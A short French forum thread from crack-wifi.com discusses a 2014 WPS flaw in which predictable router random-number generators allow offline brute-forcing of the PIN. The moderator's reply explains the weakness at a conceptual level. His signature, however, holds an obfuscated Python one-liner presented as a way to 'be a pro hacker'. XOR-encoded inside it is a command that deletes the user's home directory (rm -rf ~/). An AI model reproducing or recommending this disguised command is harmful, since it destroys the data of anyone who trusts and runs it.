Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 01-09-2014 11:54:06

EliotFR
N00b
Inscription : 23-08-2014
Messages : 3

Nouvelle faille WPS

Bonjour,

Je viens de lire une news sur  Tom's Hardware et je cite :

Cette nouvelle faille est plus efficace : elle ne nécessite qu'un essai, le code PIN est ensuite calculé à partir des données récupérées.
Le problème vient visiblement du générateur de nombres aléatoire dans les points d'accès : ceux qui sont équipés d'une puce Broadcom ont un générateur de nombres aléatoires qui est prévisible alors que celui d'un autre constructeur (qui n'est pas cité) ne fonctionne tout simplement pas.


Je pense que l'aglo en question utilise le temps pour générer ses nombres.
Après dans le genre, on parle mais il n'y a aucune source et on aborde surtout pas la technique...
Bref, je reste sur ma faim, Est ce que qqu'un a des info la dessus ?

Source : http://www.tomshardware.fr/articles/wps … tor=RSS-11

EliotFR

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 01-09-2014 16:23:53

neops
Nouveau membre
Inscription : 31-12-2011
Messages : 8

Re : Nouvelle faille WPS

+1 je suis rester comme toi

ps la source reel http://arstechnica.com/security/2014/08 … ulnerable/

Dernière modification par neops (01-09-2014 16:25:51)

Hors Ligne

#3 01-09-2014 20:48:54

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Nouvelle faille WPS

superbe.
la faille vient du fait que les générateurs aléatoires sont des PRNG classiques dans le monde de l'embarqué, avec très peu d'états (32bits,0x100000000,4294967296) et qu'il y a une série de données émises à la suite par l'AP :

- random() (un état copier-coller)
- hash(pin1+random())
- hash(pin2+random())

Si on trouve à que nombre en est l'AP pour le premier (l'état du PRNG) et qu'il n'y a pas d'ajout d'entropie, on peut déduire les deux appels suivants. et donc bruteforcer les hashs de pin1 et pin2 offline.

(je ne suis pas certain de mon analyse, ça mérite relecture)
ps la source réelle http://www.slideshare.net/0xcite/offlin … cted-setup


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Épinglée :
22 2351 02-12-2016 22:38:31 par kcdtv
0 161 29-10-2016 11:12:05 par sukawa2007
11 446 05-09-2016 15:07:25 par MiscL
81 15764 29-06-2016 10:27:55 par Fab955
21 8232 15-01-2016 13:53:04 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]